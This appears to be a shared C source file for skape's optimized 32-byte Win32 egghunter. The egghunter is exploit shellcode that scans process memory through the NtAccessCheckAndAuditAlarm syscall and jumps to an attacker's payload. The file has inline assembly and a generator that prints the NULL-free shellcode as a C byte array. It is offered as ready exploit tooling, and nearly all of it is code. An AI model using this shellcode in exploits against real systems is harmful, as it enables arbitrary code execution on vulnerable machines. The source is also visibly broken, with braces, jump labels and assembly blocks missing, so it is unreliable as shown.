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Created October 22, 2014 21:10
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egghunt shellcode for win32
* Optimized egghunt shellcode for win32 (32 bytes)
* Credits:
* Description
* This code works by abusing an NT syscall (NtAccessCheckAndAuditAlaram)
* whereby it uses the kernel to validate whether or not a set of addresses
* is valid, and, if it is, whether or not they match the 8 byte egg we're
* searching for. The egg byte egg consists of 4 bytes of executable
* assembly that will appear 2 times, once after the other. For instance,
* the egg 0x50905090 would be used with the following assembly:
* nop
* push eax
* nop
* push eax
* nop
* push eax
* nop
* push eax
* When the egg hunter searches for 0x50905090 it will eventually
* match with the above assembly and jump to it, starting at the
* first nop.
* The use of NtAccessCheckAndAuditAlarm may have problems if the thread
* is using an impersonation token. However, this is the most portable
* system call number to use.
* Targets
* NT/2K/XP/2K3
* Usage
* $ egghunt.exe
* Usage: egghunt.exe [test | cstyle] [4 byte hex egg]
* To generate usable code (with an egg of 42 41 42 41):
* $ egghunt.exe cstyle 0x41424142
* To test the code:
* $ egghunt.exe test
* Features/Quirks
* * No NULLs.
* Disclaimer
* The author cannot be held responsible for how this code is used.
* Compile
* cl egghunt.c /link /debug
* Credits
* Props go out to spoonm, optyx, trew, and johnycsh for optimization
* tips 'n tricks over the course of this shtuff.
* skape
#include <stdio.h>
#define EGG_OFFSET 18
#define SET_EGG(sc, egg) *(unsigned long *)((sc) + EGG_OFFSET) = (egg)
void __declspec(naked) egghunt_begin()
// You could put an xor edx, edx here to make the search somewhat
// quicker, but given page aligned searching, it really isn't that bad
// to omit it, and it saves two bytes.
or dx, 0x0fff // Add PAGE_SIZE-1 to edx
inc edx // Increment our pointer by one
push edx // Save edx
push 0x2 // Push NtAccessCheckAndAuditAlarm
pop eax // Pop into eax
int 0x2e // Perform the syscall
cmp al, 0x05 // Did we get 0xc0000005 (ACCESS_VIOLATION) ?
pop edx // Restore edx
je loop_inc_page // Yes, invalid ptr, go to the next page
mov eax, 0x50905090 // Throw our egg in eax
mov edi, edx // Set edi to the pointer we validated
scasd // Compare the dword in edi to eax
jnz loop_inc_one // No match? Increment the pointer by one
scasd // Compare the dword in edi to eax again (which is now edx + 4)
jnz loop_inc_one // No match? Increment the pointer by one
jmp edi // Found the egg. Jump 8 bytes past it into our code.
void __declspec(naked) egghunt_end()
// These first 8 bytes make up our egg
push eax
push eax
push eax
push eax
printf("Egg has been found.\n");
void __declspec(naked) egghunt_end_end()
__asm ret
int main(int argc, char **argv)
if (argc == 1)
fprintf(stdout, "Usage: %s [test | cstyle] [4 byte egg hex (eg: 0x41424142)]\n", argv[0]);
return 0;
if (!strcmp(argv[1], "test"))
else if (!strcmp(argv[1], "cstyle"))
unsigned char *start = (unsigned char *)((unsigned char *)egghunt_begin);
unsigned char *stop = (unsigned char *)((unsigned char *)egghunt_end);
unsigned char *copy = NULL;
unsigned char *c = NULL;
unsigned long x = 0, length, y = 0, egg = 0x50905090;
// Calculate the actual address in memory of the begin/end function based off their relative jmp points.
start += *(unsigned long *)((unsigned char *)egghunt_begin + 1) + 5;
stop += *(unsigned long *)((unsigned char *)egghunt_end + 1) + 5;
length = stop - start;
if (!(copy = (unsigned char *)malloc(length)))
printf("allocation failed\n");
return 0;
memcpy(copy, start, length);
if (argc >= 3)
egg = strtoul(argv[2], NULL, 16);
SET_EGG(copy, egg);
fprintf(stdout, "// %lu byte egghunt shellcode (egg=0x%.8x)\n\n", length, egg);
fprintf(stdout, "unsigned char egghunt[] = \"");
for (x = 0;
x < length;
fprintf(stdout, "\\x%2.2x", copy[x]);
fprintf(stdout, "\";\n\n");
fprintf(stdout, "%s: invalid option\n", argv[0]);
return 1;
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